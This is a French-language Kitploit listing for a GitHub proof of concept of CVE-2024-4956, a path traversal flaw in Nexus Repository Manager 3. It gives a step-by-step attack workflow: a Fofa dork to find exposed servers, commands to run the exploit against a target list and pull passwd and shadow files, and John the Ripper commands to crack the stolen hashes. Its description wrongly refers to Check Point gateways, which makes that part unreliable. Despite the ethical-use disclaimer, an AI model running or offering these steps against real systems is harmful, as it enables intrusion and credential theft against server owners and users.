Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-4956 — POC - CVE-2024–4956 - Traversée de chemin non authentifiée dans Nexus Repository Manager 3 | Kitploit
Outils/GitHubGitHub/verylazytech/cve-2024-4956
Cassage de Mots de PasseReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'Informations
GitHubverylazytech/cve-2024-4956

CVE-2024-4956

POC - CVE-2024–4956 - Traversée de chemin non authentifiée dans Nexus Repository Manager 3

Voir le dépôt
16428il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2024-4956

My Shop Medium Github Buy Me A Coffee

POC - CVE-2024–4956 - Traversée de chemin non authentifiée de Nexus Repository Manager 3

Permettant potentiellement à un attaquant de lire certaines informations sur les Check Point Security Gateways une fois connectés à Internet et activés avec Remote Access VPN ou Mobile Access Software Blades. Un correctif de sécurité qui atténue cette vulnérabilité est disponible.

En savoir plus — CVE-2024-4956

Avertissement : Cette preuve de concept (POC) est réalisée uniquement à des fins éducatives et de test éthique. L'utilisation de cet outil pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs déclinent toute responsabilité et ne sont pas responsables des mauvais usages ou des dommages causés par ce programme.

Pour commencer

Trouver des cibles

Pour trouver des cibles potentielles, utilisez Fofa (similaire à Shodan.io) :

  • Fofa Dork: header="Server: Nexus/3.53.0-01 (OSS)"

Alt text

D'abord, clonez le dépôt :

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-4956

Ensuite, choisissez votre cible et ajoutez-la au fichier list.txt au format suivant :

  • https://ip_address

Exécutez l'exploit :

root@kitploit:~
python3 CVE-2024-4956.py -l list.txt

La sortie correspond aux fichiers passwd et shadow trouvés :

Alt text

Maintenant, après avoir trouvé les fichiers passwd et shadow, vous pouvez essayer de craquer le hash avec JohnTheRipper. Après avoir exécuté l'exploit, vous avez 2 fichiers, passwd et shadow, vous pouvez donc les fusionner en un seul fichier et essayer de les craquer (j'ai utilisé rockyou.txt mais cela peut être n'importe quelle liste de mots de passe) :

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Télécharger l’outil